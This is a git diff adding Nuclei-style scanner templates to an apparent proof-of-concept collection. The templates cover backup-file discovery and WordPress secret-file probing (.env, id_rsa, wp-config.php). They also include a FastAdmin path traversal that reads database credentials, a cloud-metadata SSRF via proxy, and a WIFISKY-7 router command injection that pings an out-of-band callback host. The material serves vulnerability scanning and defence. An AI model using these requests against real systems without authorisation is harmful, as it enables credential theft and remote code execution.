diff --git a/date.txt b/date.txt
index e99b9656d6..9a7f1aceb2 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20241103
+20241104
diff --git a/poc.txt b/poc.txt
index 8b2acb783e..fb151859e8 100644
--- a/poc.txt
+++ b/poc.txt
@@ -6860,6 +6860,7 @@
./poc/backup/snapshot-backup-518ee5abfc5c619140ace18f02fca8ee.yaml
./poc/backup/snapshot-backup.yaml
./poc/backup/urbackup-panel.yaml
+./poc/backup/vabro-backup-file-finder.yaml
./poc/backup/veeam-backup-azure-panel.yaml
./poc/backup/veeam-backup-gcp.yaml
./poc/backup/veritas-netbackup.yaml
@@ -44564,6 +44565,7 @@
./poc/cve/CVE-2024-7895.yaml
./poc/cve/CVE-2024-7918-a7e65e7119ee7b26b163171cf42cfe15.yaml
./poc/cve/CVE-2024-7918.yaml
+./poc/cve/CVE-2024-7928.yaml
./poc/cve/CVE-2024-7950-4a4c660d480c32376f512832d16b17e2.yaml
./poc/cve/CVE-2024-7950.yaml
./poc/cve/CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd.yaml
@@ -57873,6 +57875,7 @@
./poc/exposed/webpack-sourcemap-disclosure.yaml
./poc/exposed/wget-hsts-list-exposure.yaml
./poc/exposed/wordpress-config-disclosure.yaml
+./poc/exposed/wordpress-exposure.yaml
./poc/exposed/wordpress-path-disclosure.yaml
./poc/exposed/wordpress-sensitive-config.yaml
./poc/exposed/wordpress-wp-config-exposure.yml
@@ -112312,6 +112315,7 @@
./poc/remote_code_execution/Typecho-Rce.yaml
./poc/remote_code_execution/VMware-CVE-2022-22954-RCE.yml
./poc/remote_code_execution/VOIPrce.yaml
+./poc/remote_code_execution/Wifisky-7-RCE.yaml
./poc/remote_code_execution/Wordpress-Social_Warfare_Plugins-RCE.yaml
./poc/remote_code_execution/Wordpress-force_download_Plugins-FileDownload.yaml
./poc/remote_code_execution/YealinkPreauthrce.yaml
@@ -131376,6 +131380,7 @@
./poc/wordpress/wordpress-exit-box-lite-b885aa8757fedd66d898c12224efaf9e.yaml
./poc/wordpress/wordpress-exit-box-lite-e4f715486bc2f2be2ab66f9091e37d49.yaml
./poc/wordpress/wordpress-exit-box-lite.yaml
+./poc/wordpress/wordpress-exposure.yaml
./poc/wordpress/wordpress-ext-adaptive-images-lfi.yaml
./poc/wordpress/wordpress-ext-adaptive-images-lfi.yml
./poc/wordpress/wordpress-ext-mailpress-rce.yaml
diff --git a/poc/backup/vabro-backup-file-finder.yaml b/poc/backup/vabro-backup-file-finder.yaml
new file mode 100644
index 0000000000..33d3ad98c6
--- /dev/null
+++ b/poc/backup/vabro-backup-file-finder.yaml
@@ -0,0 +1,140 @@
+id: backup-files
+info:
+ name: Backup Files Finder (information disclosure)
+ author: Vabro
+ severity: High
+ description: |
+ This template checks for common backup file extensions that may have been left exposed on a target.
+
+requests:
+ - name: backup-files
+ path:
+ - "/backup"
+ - "/backups"
+ - "/root"
+ - "/www"
+ - "/public_html"
+ - "/ht_docs"
+ - "/files"
+ - "/images"
+ - "/assets"
+ - "/media"
+ - "/documents"
+ - "/resources"
+ - "/wp-content/uploads"
+ method: GET
+ matchers-condition: or
+ matchers:
+ - type: word
+ words:
+ - ".bak"
+ - ".old"
+ - ".zip"
+ - ".tar"
+ - ".tar.gz"
+ - ".tar.bz2"
+ - ".tar.xz"
+ - ".7z"
+ - ".rar"
+ - ".gz"
+ - ".bz2"
+ - ".xz"
+ - ".sql"
+ - ".db"
+ - ".bak"
+ - ".swp"
+ - ".swp"
+ - ".save"
+ - ".save"
+ - ".sav"
+ - ".sav"
+ - ".copy"
+ - ".copy"
+ - ".backup"
+ - ".backup"
+ - ".orig"
+ - ".orig"
+ - ".old"
+ - ".old"
+ - ".tmp"
+ - ".tmp"
+ - ".temp"
+ - ".temp"
+ - ".test"
+ - ".test"
+ - ".demo"
+ - ".demo"
+ - ".dev"
+ - ".dev"
+ - ".sample"
+ - ".sample"
+ - ".example"
+ - ".example"
+ - ".backup"
+ - ".backup"
+ - ".config"
+ - ".config"
+ - ".conf"
+ - ".conf"
+ - ".log"
+ - ".log"
+ - ".txt"
+ - ".txt"
+ - ".doc"
+ - ".doc"
+ - ".docx"
+ - ".xls"
+ - ".xlsx"
+ - ".ppt"
+ - ".pptx"
+ - ".pdf"
+ - ".csv"
+ - ".bak"
+ - ".bak"
+ - ".swp"
+ - ".swp"
+ - ".save"
+ - ".save"
+ - ".sav"
+ - ".sav"
+ - ".copy"
+ - ".copy"
+ - ".backup"
+ - ".backup"
+ - ".orig"
+ - ".orig"
+ - ".old"
+ - ".old"
+ - ".tmp"
+ - ".tmp"
+ - ".temp"
+ - ".temp"
+ - ".test"
+ - ".test"
+ - ".demo"
+ - ".demo"
+ - ".dev"
+ - ".dev"
+ - ".sample"
+ - ".sample"
+ - ".example"
+ - ".example"
+ - ".backup"
+ - ".backup"
+ - ".config"
+ - ".config"
+ - ".conf"
+ - ".conf"
+ - ".log"
+ - ".log"
+ - ".txt"
+ - ".txt"
+ - ".doc"
+ - ".doc"
+ - ".docx"
+ - ".xls"
+ - ".xlsx"
+ - ".ppt"
+ - ".pptx"
+ - ".pdf"
+ - ".csv"
diff --git a/poc/cve/CVE-2024-7928.yaml b/poc/cve/CVE-2024-7928.yaml
new file mode 100644
index 0000000000..2e5ec9d10a
--- /dev/null
+++ b/poc/cve/CVE-2024-7928.yaml
@@ -0,0 +1,51 @@
+id: CVE-2024-7928
+
+info:
+ name: FastAdmin < V1.3.4.20220530 - Path Traversal
+ author: s4e-io
+ severity: medium
+ description: |
+ A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.
+ reference:
+ - https://wiki.shikangsi.com/post/share/da0292b8-0f92-4e6e-bdb7-73f47b901acd
+ - https://github.com/bigb0x/CVE-2024-7928
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-7928
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-7928
+ cwe-id: CWE-22
+ cpe: cpe:2.3:a:fastadmin:fastadmin:1.3.3.20220121:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: fastadmin
+ product: fastadmin
+ fofa-query: icon_hash="-1036943727"
+ tags: cve,cve2024,fastadmin,lfi
+
+http:
+ - raw:
+ - |
+ GET /index/ajax/lang?lang=../../application/database HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'jsonpReturn('
+ - '"password":'
+ - '"username":'
+ - '"database":'
+ condition: and
+
+ - type: word
+ part: content_type
+ words:
+ - 'application/javascript'
+
+ - type: status
+ status:
+ - 200
+# digest: 4a0a0047304502206a03af2bd622586d9ea3423ce05fb8c99fe1ec1940335aca969aece8642d4cf9022100e4fa51cfa54ae2d026551a9ff270d3e4c5e52c4645e364558c90b77f36d71458:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/exposed/wordpress-exposure.yaml b/poc/exposed/wordpress-exposure.yaml
new file mode 100644
index 0000000000..f9b09655d6
--- /dev/null
+++ b/poc/exposed/wordpress-exposure.yaml
@@ -0,0 +1,84 @@
+id: wordpress-exposed-files
+
+info:
+ name: WordPress Exposed Sensitive Files Detection
+ author: Redflare-Cyber
+ severity: high
+ description: Detects potentially exposed sensitive WordPress files that may contain credentials, tokens, or PIIs, some are general and not Wordpress specific so may overlap with other similar templates.
+ tags: wordpress, exposure, creds,
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}{{file}}"
+
+ attack: clusterbomb
+
+ payloads:
+ file:
+ - /wp-config.php{{suffix}}
+ - /backup{{suffix}}
+ - /database{{suffix}}
+ - /dump{{suffix}}
+ - /wp-config.php{{archive_ext}}
+ - /backup{{archive_ext}}
+ - /database{{archive_ext}}
+ - /dump{{archive_ext}}
+ - /wp-config-sample.php
+ - /.env
+ - /.git/config
+ - /.svn/entries
+ - /.hg/requires
+ - /.bzr/branch-format
+ - /.DS_Store
+ - /debug.log
+ - /error_log
+ - /phpinfo.php
+ - /composer.lock
+ - /composer.json
+ - /id_rsa
+ - /id_rsa.pub
+ - /.htpasswd
+ - /.htaccess
+ - /logs/access.log
+ - /logs/error.log
+ - /wp-content/debug.log
+ - /wp-content/uploads/.htaccess
+ - /wp-includes/php.ini
+ - /php.ini
+ - /info.php
+ suffix:
+ - ''
+ - '~'
+ - '.bak'
+ - '.old'
+ - '.save'
+ - '.swp'
+ - '.swo'
+ - '.sql'
+ archive_ext:
+ - '.zip'
+ - '.tar.gz'
+ - '.tar.bz2'
+ - '.tar'
+ - '.gz'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - 206
+
+ - type: regex
+ part: body
+ regex:
+ - '(?i)(DB_(NAME|USER|PASSWORD|HOST))'
+ - '(?i)(AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|NONCE_KEY)'
+ - '(?i)(FTP_(USER|PASS))'
+ - '(?i)(phpinfo\(\))'
+ - '(?i)(repositoryformatversion|svn|openssl)'
+ - '(?i)(-----BEGIN [A-Z ]*PRIVATE KEY-----)'
+ - '(?i)(root:.*:(/bin/bash|/bin/sh))'
+ - '(?i)(\$cfg\["blowfish_secret"\])'
+ condition: or
diff --git a/poc/other/metadata-alibaba.yaml b/poc/other/metadata-alibaba.yaml
index 7a71541371..b190f9259c 100644
--- a/poc/other/metadata-alibaba.yaml
+++ b/poc/other/metadata-alibaba.yaml
@@ -1,8 +1,9 @@
id: metadata-service-alibaba
+
# This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to
-# the proxy using the full metadata URL, which the proxy will fulfull to its
-# own metadata sevice.
+# the proxy using the full metadata URL, which the proxy will fulfill to its
+# own metadata service.
#
# The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network.
@@ -11,17 +12,20 @@ info:
author: sullo
severity: critical
description: The Alibaba host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure.
- remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
+ remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference:
- https://www.alibabacloud.com/help/doc-detail/108460.htm
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
- https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/
- tags: exposure,config,alibaba,proxy,misconfig,metadata
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cwe-id: CWE-441
-requests:
+ metadata:
+ max-request: 2
+ tags: exposure,config,alibaba,proxy,misconfig,metadata
+
+http:
- raw:
- |+
GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1
@@ -29,7 +33,7 @@ requests:
payloads:
hostval:
- - alibaba.interact.sh
+ - alibaba.oast.pro
- 100.100.100.200
unsafe: true
matchers:
@@ -37,3 +41,5 @@ requests:
part: body
words:
- "zone-id"
+
+# digest: 490a004630440220495fde6b8e524846446e53dead7f589f22c254d0ca7b6e09e07210469773749f0220264d2180b4589c8663f68bab544d951ad739fae7f3b6dccaaacee29718cb4778:922c64590222798bb761d5b6d8e72950
diff --git a/poc/remote_code_execution/Wifisky-7-RCE.yaml b/poc/remote_code_execution/Wifisky-7-RCE.yaml
new file mode 100644
index 0000000000..2564f6d6b2
--- /dev/null
+++ b/poc/remote_code_execution/Wifisky-7-RCE.yaml
@@ -0,0 +1,37 @@
+id: wifisky7-rce
+
+info:
+ name: WIFISKY-7 Layer Flow Control Router - Remote Code Execution
+ author: pussycat0x
+ severity: high
+ description: |
+ There is an RCE vulnerability in the confirm.php interface of WIFISKY-7 layer flow control router
+ reference:
+ - https://github.com/wy876/POC/blob/main/WIFISKY-7%E5%B1%82%E6%B5%81%E6%8E%A7%E8%B7%AF%E7%94%B1%E5%99%A8confirm.php%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: title="WIFISKY 7层流控路由器"
+ tags: wifisky,rce
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/notice/confirm.php?t=%3bping+-c+3+{{interactsh-url}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
+
+ - type: word
+ part: header
+ words:
+ - "L7Engine"
+
+ - type: status
+ status:
+ - 200
+# digest: 490a00463044022073b20dd539c2f97f4d77df2710669ac8a48b867a4ebe397c7c80a3a667a3c1df02200b4c8bc61b0fb453d1fff643e6880e69c4b91f3223e5cd23d5d22f8bdb6fa3fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/wordpress/wordpress-exposure.yaml b/poc/wordpress/wordpress-exposure.yaml
new file mode 100644
index 0000000000..f9b09655d6
--- /dev/null
+++ b/poc/wordpress/wordpress-exposure.yaml
@@ -0,0 +1,84 @@
+id: wordpress-exposed-files
+
+info:
+ name: WordPress Exposed Sensitive Files Detection
+ author: Redflare-Cyber
+ severity: high
+ description: Detects potentially exposed sensitive WordPress files that may contain credentials, tokens, or PIIs, some are general and not Wordpress specific so may overlap with other similar templates.
+ tags: wordpress, exposure, creds,
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}{{file}}"
+
+ attack: clusterbomb
+
+ payloads:
+ file:
+ - /wp-config.php{{suffix}}
+ - /backup{{suffix}}
+ - /database{{suffix}}
+ - /dump{{suffix}}
+ - /wp-config.php{{archive_ext}}
+ - /backup{{archive_ext}}
+ - /database{{archive_ext}}
+ - /dump{{archive_ext}}
+ - /wp-config-sample.php
+ - /.env
+ - /.git/config
+ - /.svn/entries
+ - /.hg/requires
+ - /.bzr/branch-format
+ - /.DS_Store
+ - /debug.log
+ - /error_log
+ - /phpinfo.php
+ - /composer.lock
+ - /composer.json
+ - /id_rsa
+ - /id_rsa.pub
+ - /.htpasswd
+ - /.htaccess
+ - /logs/access.log
+ - /logs/error.log
+ - /wp-content/debug.log
+ - /wp-content/uploads/.htaccess
+ - /wp-includes/php.ini
+ - /php.ini
+ - /info.php
+ suffix:
+ - ''
+ - '~'
+ - '.bak'
+ - '.old'
+ - '.save'
+ - '.swp'
+ - '.swo'
+ - '.sql'
+ archive_ext:
+ - '.zip'
+ - '.tar.gz'
+ - '.tar.bz2'
+ - '.tar'
+ - '.gz'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - 206
+
+ - type: regex
+ part: body
+ regex:
+ - '(?i)(DB_(NAME|USER|PASSWORD|HOST))'
+ - '(?i)(AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|NONCE_KEY)'
+ - '(?i)(FTP_(USER|PASS))'
+ - '(?i)(phpinfo\(\))'
+ - '(?i)(repositoryformatversion|svn|openssl)'
+ - '(?i)(-----BEGIN [A-Z ]*PRIVATE KEY-----)'
+ - '(?i)(root:.*:(/bin/bash|/bin/sh))'
+ - '(?i)(\$cfg\["blowfish_secret"\])'
+ condition: or